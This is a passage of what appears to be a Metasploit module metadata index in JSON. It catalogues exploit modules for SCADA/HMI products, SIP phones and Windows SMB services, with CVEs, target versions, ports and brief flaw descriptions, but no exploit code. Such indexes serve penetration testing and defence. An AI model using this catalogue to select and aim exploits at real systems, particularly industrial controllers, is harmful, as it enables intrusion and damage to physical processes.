"is_install_path": true,
"ref_name": "windows/scada/indusoft_webstudio_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/moxa_mdmtool": {
"name": "MOXA Device Manager Tool 2.1 Buffer Overflow",
"full_name": "exploit/windows/scada/moxa_mdmtool",
"rank": 500,
"disclosure_date": "2010-10-20",
"type": "exploit",
"author": [
"Ruben Santamarta",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n When sending a specially crafted MDMGw (MDM2_Gateway) response, an\n attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4741",
"OSVDB-69027",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-301-01A.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MOXA MDM Tool 2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/moxa_mdmtool.rb",
"is_install_path": true,
"ref_name": "windows/scada/moxa_mdmtool",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/procyon_core_server": {
"name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow",
"full_name": "exploit/windows/scada/procyon_core_server",
"rank": 300,
"disclosure_date": "2011-09-08",
"type": "exploit",
"author": [
"Knud Hojgaard <keh@nsense.dk>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. Also, after the\n payload exits, Coreservice.exe should automatically recover.",
"references": [
"CVE-2011-3322",
"OSVDB-75371",
"URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow"
],
"platform": "Windows",
"arch": "",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 - No dep bypass"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/procyon_core_server.rb",
"is_install_path": true,
"ref_name": "windows/scada/procyon_core_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin": {
"name": "DATAC RealWin SCADA Server Buffer Overflow",
"full_name": "exploit/windows/scada/realwin",
"rank": 500,
"disclosure_date": "2008-09-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.0.10.37).\n By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2008-4322",
"OSVDB-48606",
"BID-31418"
],
"platform": "Windows",
"arch": "",
"rport": 910,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_on_fc_binfile_a": {
"name": "DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_on_fc_binfile_a",
"rank": 500,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability found in DATAC Control International RealWin\n SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n packet via port 910, RealWin will try to create a file (which would be saved to\n C:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n supplied filename with an inline memcpy routine without proper bounds checking, which\n results a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n Tested version: 2.0 (Build 6.1.8.10)",
"references": [
"CVE-2011-1563",
"OSVDB-72826",
"BID-46937",
"URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 910,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_on_fc_binfile_a",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_on_fcs_login": {
"name": "RealWin SCADA Server DATAC Login Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_on_fcs_login",
"rank": 500,
"disclosure_date": "2011-03-21",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>",
"B|H <bh[AT]bufferattack.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n packet containing a long username, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2011-1563",
"OSVDB-72824",
"URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt",
"URL-http://www.dataconline.com/software/realwin.php",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 910,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_on_fcs_login.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_on_fcs_login",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_scpc_initialize": {
"name": "DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_scpc_initialize",
"rank": 500,
"disclosure_date": "2010-10-15",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-68812",
"CVE-2010-4142",
"URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 912,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_scpc_initialize.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_scpc_initialize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_scpc_initialize_rf": {
"name": "DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_scpc_initialize_rf",
"rank": 500,
"disclosure_date": "2010-10-15",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-68812",
"CVE-2010-4142",
"URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 912,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_scpc_initialize_rf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/realwin_scpc_txtevent": {
"name": "DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow",
"full_name": "exploit/windows/scada/realwin_scpc_txtevent",
"rank": 500,
"disclosure_date": "2010-11-18",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2010-4142",
"OSVDB-68812"
],
"platform": "Windows",
"arch": "",
"rport": 912,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/realwin_scpc_txtevent.rb",
"is_install_path": true,
"ref_name": "windows/scada/realwin_scpc_txtevent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/scadapro_cmdexe": {
"name": "Measuresoft ScadaPro Remote Command Execution",
"full_name": "exploit/windows/scada/scadapro_cmdexe",
"rank": 600,
"disclosure_date": "2011-09-16",
"type": "exploit",
"author": [
"Luigi Auriemma",
"mr_me <steventhomasseeley@gmail.com>",
"TecR0c <tecr0c@tecninja.net>"
],
"description": "This module allows remote attackers to execute arbitrary commands on the\n affected system by abusing via Directory Traversal attack when using the\n 'xf' command (execute function). An attacker can execute system() from\n msvcrt.dll to upload a backdoor and gain remote code execution. This\n vulnerability affects version 4.0.0 and earlier.",
"references": [
"CVE-2011-3497",
"OSVDB-75490",
"BID-49613",
"URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt",
"URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf",
"URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx"
],
"platform": "Windows",
"arch": "",
"rport": 11234,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/scada/scadapro_cmdexe.rb",
"is_install_path": true,
"ref_name": "windows/scada/scadapro_cmdexe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/sunway_force_control_netdbsrv": {
"name": "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",
"full_name": "exploit/windows/scada/sunway_force_control_netdbsrv",
"rank": 500,
"disclosure_date": "2011-09-22",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Rinat Ziyayev",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.",
"references": [
"OSVDB-75798",
"BID-49747",
"URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": 2001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb",
"is_install_path": true,
"ref_name": "windows/scada/sunway_force_control_netdbsrv",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/winlog_runtime": {
"name": "Sielco Sistemi Winlog Buffer Overflow",
"full_name": "exploit/windows/scada/winlog_runtime",
"rank": 500,
"disclosure_date": "2011-01-13",
"type": "exploit",
"author": [
"Luigi Auriemma",
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Sielco\n Sistem Winlog <= 2.07.00. When sending a specially formatted\n packet to the Runtime.exe service, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2011-0517",
"OSVDB-70418",
"URL-http://aluigi.org/adv/winlog_1-adv.txt",
"URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-017-02.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 46823,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Winlog Lite 2.07.00"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/winlog_runtime.rb",
"is_install_path": true,
"ref_name": "windows/scada/winlog_runtime",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/winlog_runtime_2": {
"name": "Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16",
"full_name": "exploit/windows/scada/winlog_runtime_2",
"rank": 300,
"disclosure_date": "2012-06-04",
"type": "exploit",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.\n When sending a specially formatted packet to the Runtime.exe service on port 46824,\n an attacker may be able to execute arbitrary code.",
"references": [
"BID-53811",
"CVE-2012-3815",
"OSVDB-82654",
"EDB-18986",
"URL-http://www.s3cur1ty.de/m1adv2012-001",
"URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html"
],
"platform": "Windows",
"arch": "",
"rport": 46824,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project",
"Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/winlog_runtime_2.rb",
"is_install_path": true,
"ref_name": "windows/scada/winlog_runtime_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkbcopyd_bof": {
"name": "Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkbcopyd_bof",
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
"CVE-2014-0784"
],
"platform": "Windows",
"arch": "",
"rport": 20111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkbcopyd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkesimmgr_bof": {
"name": "Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkesimmgr_bof",
"rank": 300,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n insecure usage of memcpy, using attacker controlled data as the size count. This module\n has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.",
"references": [
"CVE-2014-0782",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 34205,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkesimmgr_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkfsim_vhfd": {
"name": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkfsim_vhfd",
"rank": 300,
"disclosure_date": "2014-05-23",
"type": "exploit",
"author": [
"Redsadic <julian.vilas@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.",
"references": [
"CVE-2014-3888",
"URL-http://jvn.jp/vu/JVNVU95045914/index.html",
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
],
"platform": "Windows",
"arch": "",
"rport": 20010,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkfsim_vhfd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/scada/yokogawa_bkhodeq_bof": {
"name": "Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",
"full_name": "exploit/windows/scada/yokogawa_bkhodeq_bof",
"rank": 200,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>",
"Redsadic <julian.vilas@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.",
"references": [
"URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
"CVE-2014-0783"
],
"platform": "Windows",
"arch": "",
"rport": 20171,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb",
"is_install_path": true,
"ref_name": "windows/scada/yokogawa_bkhodeq_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/sip/aim_triton_cseq": {
"name": "AIM Triton 1.0.4 CSeq Buffer Overflow",
"full_name": "exploit/windows/sip/aim_triton_cseq",
"rank": 500,
"disclosure_date": "2006-07-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.",
"references": [
"CVE-2006-3524",
"OSVDB-27122",
"BID-18906"
],
"platform": "Windows",
"arch": "",
"rport": 5061,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"AIM Triton 1.0.4 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/sip/aim_triton_cseq.rb",
"is_install_path": true,
"ref_name": "windows/sip/aim_triton_cseq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/sip/sipxezphone_cseq": {
"name": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",
"full_name": "exploit/windows/sip/sipxezphone_cseq",
"rank": 500,
"disclosure_date": "2006-07-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.",
"references": [
"CVE-2006-3524",
"OSVDB-27122",
"BID-18906"
],
"platform": "Windows",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"sipXezPhone 0.35a Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/sip/sipxezphone_cseq.rb",
"is_install_path": true,
"ref_name": "windows/sip/sipxezphone_cseq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/sip/sipxphone_cseq": {
"name": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",
"full_name": "exploit/windows/sip/sipxphone_cseq",
"rank": 500,
"disclosure_date": "2006-07-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.",
"references": [
"CVE-2006-3524",
"OSVDB-27122",
"BID-18906"
],
"platform": "Windows",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SIPfoundry sipXphone 2.6.0.27 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/sip/sipxphone_cseq.rb",
"is_install_path": true,
"ref_name": "windows/sip/sipxphone_cseq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/generic_smb_dll_injection": {
"name": "Generic DLL Injection From Shared Resource",
"full_name": "exploit/windows/smb/generic_smb_dll_injection",
"rank": 0,
"disclosure_date": "2015-03-04",
"type": "exploit",
"author": [
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This is a general-purpose module for exploiting conditions where a DLL can be loaded\n from a specified SMB share. This module serves payloads as DLLs over an SMB service.",
"references": [
"CWE-114"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/smb/generic_smb_dll_injection.rb",
"is_install_path": true,
"ref_name": "windows/smb/generic_smb_dll_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/group_policy_startup": {
"name": "Group Policy Script Execution From Shared Resource",
"full_name": "exploit/windows/smb/group_policy_startup",
"rank": 0,
"disclosure_date": "2015-01-26",
"type": "exploit",
"author": [
"Sam Bertram <sbertram@gdssecurity.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This is a general-purpose module for exploiting systems with Windows Group Policy\n configured to load VBS startup/logon scripts from remote locations. This module runs\n a SMB shared resource that will provide a payload through a VBS file. Startup scripts\n will be executed with SYSTEM privileges, while logon scripts will be executed with the\n user privileges. Have into account which the attacker still needs to redirect the\n target traffic to the fake SMB share to exploit it successfully. Please note in some\n cases, it will take 5 to 10 minutes to receive a session.",
"references": [
"URL-http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html",
"URL-https://github.com/GDSSecurity/BadSamba"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/group_policy_startup.rb",
"is_install_path": true,
"ref_name": "windows/smb/group_policy_startup",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ipass_pipe_exec": {
"name": "IPass Control Pipe Remote Command Execution",
"full_name": "exploit/windows/smb/ipass_pipe_exec",
"rank": 600,
"disclosure_date": "2015-01-21",
"type": "exploit",
"author": [
"Matthias Kaiser",
"h0ng10 <info@mogwaisecurity.de>"
],
"description": "This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. This pipe can be abused\n to force the service to load a DLL from a SMB share.",
"references": [
"CVE-2015-0925",
"OSVDB-117423",
"BID-72265",
"URL-http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows x32",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb",
"is_install_path": true,
"ref_name": "windows/smb/ipass_pipe_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms03_049_netapi": {
"name": "MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow",
"full_name": "exploit/windows/smb/ms03_049_netapi",
"rank": 400,
"disclosure_date": "2003-11-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n function using the Workstation service in Windows XP.",
"references": [
"CVE-2003-0812",
"OSVDB-11461",
"BID-9011",
"MSB-MS03-049"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows XP SP0/SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms03_049_netapi.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms03_049_netapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms04_007_killbill": {
"name": "MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow",
"full_name": "exploit/windows/smb/ms04_007_killbill",
"rank": 100,
"disclosure_date": "2004-02-10",
"type": "exploit",
"author": [
"Solar Eclipse <solareclipse@phreedom.org>"
],
"description": "This is an exploit for a previously undisclosed\n vulnerability in the bit string decoding code in the\n Microsoft ASN.1 library. This vulnerability is not related\n to the bit string vulnerability described in eEye advisory\n AD20040210-2. Both vulnerabilities were fixed in the\n MS04-007 patch.\n\n You are only allowed one attempt with this vulnerability. If\n the payload fails to execute, the LSASS system service will\n crash and the target system will automatically reboot itself\n in 60 seconds. If the payload succeeds, the system will no\n longer be able to process authentication requests, denying\n all attempts to login through SMB or at the console. A\n reboot is required to restore proper functioning of an\n exploited system.\n\n This exploit has been successfully tested with the win32/*/reverse_tcp\n payloads, however a few problems were encountered when using the\n equivalent bind payloads. Your mileage may vary.",
"references": [
"CVE-2003-0818",
"OSVDB-3902",
"BID-9633",
"MSB-MS04-007"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
],
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms04_007_killbill",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms04_011_lsass": {
"name": "MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",
"full_name": "exploit/windows/smb/ms04_011_lsass",
"rank": 400,
"disclosure_date": "2004-04-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the LSASS service, this vulnerability\n was originally found by eEye. When re-exploiting a Windows XP system, you will need\n need to run this module twice. DCERPC request fragmentation can be performed by setting\n 'FragSize' parameter.",
"references": [
"CVE-2003-0533",
"OSVDB-5248",
"BID-10108",
"MSB-MS04-011"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targetting",
"Windows 2000 English",
"Windows XP English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/ms04_011_lsass.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms04_011_lsass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/ms04_031_netdde": {
"name": "MS04-031 Microsoft NetDDE Service Overflow",
"full_name": "exploit/windows/smb/ms04_031_netdde",
"rank": 400,
"disclosure_date": "2004-10-12",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the NetDDE service, which is the\n precursor to the DCOM interface. This exploit effects only operating systems\n released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim\n that this vulnerability can be exploited without authentication, the NDDEAPI\n pipe is only accessible after successful authentication.",
"references": [
"CVE-2004-0206",
"OSVDB-10689",
"BID-11372",
"MSB-MS04-031"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
